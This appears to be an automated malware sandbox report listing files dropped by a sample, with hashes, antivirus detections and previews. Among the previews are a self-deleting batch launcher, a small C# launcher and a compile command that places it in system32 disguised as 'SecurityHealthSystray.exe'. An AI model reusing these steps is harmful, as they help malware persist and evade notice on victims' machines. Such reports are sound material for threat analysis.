                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Users\Default\AppData\Local\Temp\b1829d2998bf98

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):218
                                                          Entropy (8bit):5.776378339472837
                                                          Encrypted:false
                                                          SSDEEP:6:huWSxrXxqGguy7n/nl1s0ucZQThCFZvYD8hM:ZAqLBTl5ZqhIZvYwhM
                                                          MD5:8D8B318D31D4835D1455587260D09E12
                                                          SHA1:D5A89996D8863F444B37B0835FA556B65BCD6401
                                                          SHA-256:7A909EF5ACE9255554880B57988195D1B92F3EF0E64D1BAAECCA7776FD30A44C
                                                          SHA-512:6989C99E035935F4BF9E47B253FCDB5D6871489490B98F24F058FAA18ECEF26FBCF532ECC3CC76B288EF16EA0320BFBB42C32DC8ADAC88BC673B849A182EEBD2
                                                          Malicious:false
                                                          Preview:3R1KpmqQTT0zWP6VG9TlmYNf7RVALWZ7IjPpJSdhfMBqBkjKjbThEEkeEVNYQpF742qw9RLxfwFaWgdWsLbtC12D9vkyFFQ0GEvI3wKSPfCS9KHh10pFOV4D9mxOqXsZfOTSuVd5AIegykEznC6PZLmuKsIR96m1xmwu0zxgWuFF1YOZi7lnbcAUmjHCMM5EgmsMyT8xPZ2oFg3vdtsCU8aVmb

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SfLAFHFXIbHzHGgilQgXtKOw.exe.log

                                                          Download File
                                                          Process:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bridgeServerFontSavesMonitor.exe.log

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                          C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):246
                                                          Entropy (8bit):5.280363117998461
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DE1WD5j2AY5bgWEYKOZG1wkn23fx:HTg9uYDEosLfJ
                                                          MD5:858941AC9FA9DDEE088066984F5E3903
                                                          SHA1:D36FAF2F874B466BE8BE14E7EE35C953EE8C15F1
                                                          SHA-256:A6D64B98ECEB722932AD680CD3B56B7324B18739D1FE9245416A79B18E8534BD
                                                          SHA-512:9F0604C6D31081A9B798945372BCAC1207BB0D48E00A43503580DF0FFAF0B5867AD4E50C7103916828399C891AB0C6E5D7F10A2464729BE191CFC5DD6EA5C739
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\FeErzF7oGb.bat"

                                                          C:\Users\user\AppData\Local\Temp\RES69DB.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Fri Jan 10 06:19:03 2025, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1944
                                                          Entropy (8bit):4.5420385428703405
                                                          Encrypted:false
                                                          SSDEEP:24:HQC9aOO+kqiBhuXDfHfWwKJNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:++sBE/1KJMluOulajfqXSfbNtmhBZ
                                                          MD5:57D8B93966A7DFF581A866EF60CF5839
                                                          SHA1:33B53E36EB8E718FF471EDBABD9D06F1675C033E
                                                          SHA-256:AF82369DC2C80DE45ED19C674011559044E0B50B7C9F596F8106C5005339B602
                                                          SHA-512:9BE71F453C02E48F30529243A54D4C40533078E06ABD8CAE3687E992D38622C2F1ACECE97896F6BAB5AFCB8B4CBAEEB6466A91E46850DCEF4712DEE1C1EB22FD
                                                          Malicious:false
                                                          Preview:L.....g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........;....c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES69DB.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\ChainBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

                                                          C:\Users\user\AppData\Local\Temp\RruUKzAjOp

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.403856189774723
                                                          Encrypted:false
                                                          SSDEEP:3:rdjXn:rdr
                                                          MD5:E17B86FFBB715F8973D8E2DB69B4928E
                                                          SHA1:F5514FC5BA047EA0D10977BFF9DB70433CC49EE8
                                                          SHA-256:47E86725DF89A0E0AB0EE785AC3C6241C9B73B1E448F0CF630D1124A47956794
                                                          SHA-512:F2A811761C44E747D6318051174F0FD641B0C4E7F4F84B28B0393A0BBBF3FAC816DAE4F0F2DFDF4C31CB1EAB2A682C48228009331CE5CF8FCE5C8106919AE26F
                                                          Malicious:false
                                                          Preview:CkP8xYCjVOFpWicd3thMXjWKr

                                                          C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.0.cs

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):417
                                                          Entropy (8bit):5.084077200645864
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLdseiFkD:JNVQIbSfhV7TiFkMSfh6FkD
                                                          MD5:61C065418F14A4276342E6FB50960C04
                                                          SHA1:AB85DAD7CAEC7FA4327E64900FFF2C8EB448B6FC
                                                          SHA-256:25EBDC2BECB54DBB7616C070C410D36FF195CB9544D5CDC89D5A13FB5C678F82
                                                          SHA-512:6625FF3E88EDA8AAA31310AB51594A0D340940B0103D3924B2D0087344B11C201BF18EE508AF2E486F575F0E4BD60C239D241B601F4C9601BCA56364D9465BAE
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.028522661364153
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fRhLBH:Hu7L//TRq79cQWfJH
                                                          MD5:20DCAC747D3A1ECD8FEBFF6947BE8E0E
                                                          SHA1:6D070C28AA454A71936CA19D75ED3BF9FA941097
                                                          SHA-256:776AC2D827E048967C459C6ABF1621255E943DAAA0DC423BEB4A2559D8804AF1
                                                          SHA-512:E1CD6130723567C1FAEB683C92D4854DC1239469394CCF2B209C55D64B59F2D0ECB458FC5BE631F53F0E3367793D18135C8B3DA4D1A53720CF5B14EBEB436FC4
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.out

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (321), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):742
                                                          Entropy (8bit):5.248874644352155
                                                          Encrypted:false
                                                          SSDEEP:12:xoMI/u7L//TRq79cQWfJOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zI/un/Vq79tWfMKax5DqBVKVrdFAMBJj
                                                          MD5:DB56D8738ACE229E968428541E164E26
                                                          SHA1:DDA2E2AC2C47135C2378BE6A1B6876B0452F70F3
                                                          SHA-256:92406C42FF94640D513DC9CEA7C4B11191BFC0E0B38F85583A1F21BF8253BA83
                                                          SHA-512:38791E4580BB85B9317D337A8BA5D11E5CC870807A002C34520F59EFFA8D350FC3E187C533E459B6AC15223D7393DF787043E0B1363449971C11107A36F48522
                                                          Malicious:false
                                                          Preview:.C:\ChainBroker> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\Desktop\ARUSTYfT.log

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          • Antivirus: Virustotal, Detection: 69%, Browse
                                                          Joe Sandbox View:
                                                          • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                          • Filename: PlZA6b48MW.exe, Detection: malicious, Browse
                                                          • Filename: wxl1r0lntg.exe, Detection: malicious, Browse
                                                          • Filename: HaLCYOFjMN.exe, Detection: malicious, Browse
                                                          • Filename: Z90Z9bYzPa.exe, Detection: malicious, Browse
                                                          • Filename: 0J5DzstGPi.exe, Detection: malicious, Browse
                                                          • Filename: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, Detection: malicious, Browse
                                                          • Filename: HMhdtzxEHf.exe, Detection: malicious, Browse
                                                          • Filename: Gg6wivFINd.exe, Detection: malicious, Browse
                                                          • Filename: onlysteal.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\VObntHLa.log

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          • Antivirus: Virustotal, Detection: 35%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\hzhmzTUD.log

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.519109060441589
                                                          Encrypted:false
                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          • Antivirus: Virustotal, Detection: 11%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\riACjval.log

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Users\user\b1829d2998bf98

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (615), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):615
                                                          Entropy (8bit):5.875939092492741
                                                          Encrypted:false
                                                          SSDEEP:12:T9IABximgoz8eD/TXJ0D+rrB9HsymGnk6Jp9Fofc1qDi1i:qABxFgS5LZFlLmk1FDKi1i
                                                          MD5:26F5D8C1E93F382F601F6C73CA5E6B65
                                                          SHA1:689DC24E15E6E6F818BDF8CD50B5C84AFDFF4D9C
                                                          SHA-256:BE7FC67170394BFA6121643690E3779482F7DA0C52C502ACF356EBF070E823B3
                                                          SHA-512:1AF19D87A484D2C4727BEB4C57D0364E852A62A4961A4EE1FC377DF5417C09EA5AFCF06EBD34D560DAC48BC557120DECBF014B57F1C9416D721C73AE868AE831
                                                          Malicious:false
                                                          Preview:5Fqj3OI7dMzelLEhigmasXgvEMo2FI8NT8MRCRS2XgJj3SJiNe1KZP3ij5erkQ2VNmKn9weROuDMN61wCFpkQyyEFosHwlSHoyWRHgja9k5pLqUmDsoekREZyGhUEXenc6hYkkpggOkq2J2YTFDE6xgXt6dB8OWmFSMPJ5BdDH8VqYhpNJB8TaqoZKpnHniR27kj6mPXDkByzKqUZyxzNXTpmiz8QXWZjrdsy7sl4n4sY1yPdUOT0tEfo57XwQHqOmPIr8gbFL4jclQutkf5JCi0n7E2AUyogOdwmqhfxxNoyeCDoMoLuLgLDYft4nauWQDOHdICCAHVz3CI5BOyqn3UrRtNLylKWdRhbx5LElJuELWJWXy3ZmEtXshzu41OY78VleqHFDtEdIQg5j1y9suuYhKsQGbKt4VGMAh1qrxW29QOcA4KCDOqNO6EU809mjUjxKT4CAIS4Y1ZR6QQLQHppo37Edhr0yuToqaSq9IC56wyWhwXrkxVbp3IQW0idacGohulf8jLIFut2EkgrJ9QAY29wSBUJjifeqKyxL2tBlMV4KQMvT1TaLFPpuyN6OCjgOOL3wtgRPOZMgElByjzsPESl4JCWoxwjmz

                                                          C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14385664
                                                          Entropy (8bit):1.4645845784334848
                                                          Encrypted:false
                                                          SSDEEP:24576:LAkClP6KrD3UGYB2Ue9L35+2WcESjvGMJoIlT1sMNAje+Iv4dr6/jg5EI5VG:khMsccEmgIT1sJjdIvqr4tI5
                                                          MD5:39953ACD4FD32884E6CAD0D1E4688051
                                                          SHA1:31579801F012118285F1FD48CCF63B07EBE1594A
                                                          SHA-256:5773E581CE59418EE4C3F205D4FA16AD74718D16D1D8E4DD37332BB4ECB850BF
                                                          SHA-512:3823AD17C90EF4454A774E59D9B5E37B11ABF451D6485C4BF7F54CF04738D01A3B6020346FC7817CB48B32CFCEFBCE46667B3B185BAF44C0FF00ECB4E027DF35
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R}g.................:..........>Y... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...D9... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................ Y......H....................... ...2t..gX.......................................0..........(.... ........8........E........8...\.......8....(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{u...9....& ....8....*....0..'....... ........8........E....G.......................V...8B...r...ps....z*~....(Q... .... .... ....s....~....(U....... ....8....8.... ....8........~....(Y...~....(]... ....<.... ....~....{....:S...& ....8H...~....9.... ....84......... ....~....{....9

                                                          C:\Windows\Migration\WTR\b1829d2998bf98

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          File Type:ASCII text, with very long lines (330), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):330
                                                          Entropy (8bit):5.81356821267711
                                                          Encrypted:false
                                                          SSDEEP:6:hi8knEv5B7/Mz9Q+FSX9p3PpD6wTzASBc8dj/yk0aqFbSumnGS5oOM2V+JoSw49e:zx55/f+i9pxDBxcMuvPFbSumF5PM2V+k
                                                          MD5:9A8D08EA63F910635F2D4872EF2B3655
                                                          SHA1:2174E9FE90C5DFF296EC308445078F022F703424
                                                          SHA-256:56F1F1094C8C8E49184014689971F19AB879D7E45528E5FF7FDD235C97E05D8C
                                                          SHA-512:9082B4FA7726AB253E254658761012864D77B9495B848177DA93882A14410626AAF95A84DF78764694B771CA0C74AE2553462C4BD7128BA9AB0433D66AD1D7ED
                                                          Malicious:false
                                                          Preview:Z8ueYYGEAY7CiyRnBqZ5bEURFZJGe1p7LYrHYNsFiAA2TI1fLm7qEt2VncY8P9kIsA0KGJPy7TWaDc87in51392cfWd6yu0ja1JTRrYBXJsuWcRLdbalDsOtHYoupS9NdwAMTpp0O4duRIFDEScXTPgrmZM3CoVEKeRkbF2ywjWJPec8TlqX0l4NQTj3dvxkiZkw1fl8Zolt2XbI7Nkb78OikDUHg9VAwvk04pHy9r7M9KV21b5PLWmkKCMyKdcaTl7GwlORGwcQACiZrbQFDFzaJAp2dTnfOh3YNOFPMnJY3WjIdxGtNXWNwh7w6WywJ7BdJJLdVA

                                                          C:\Windows\SchCache\9e8d7a4ca61bd9

                                                          Download File
                                                          Process:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
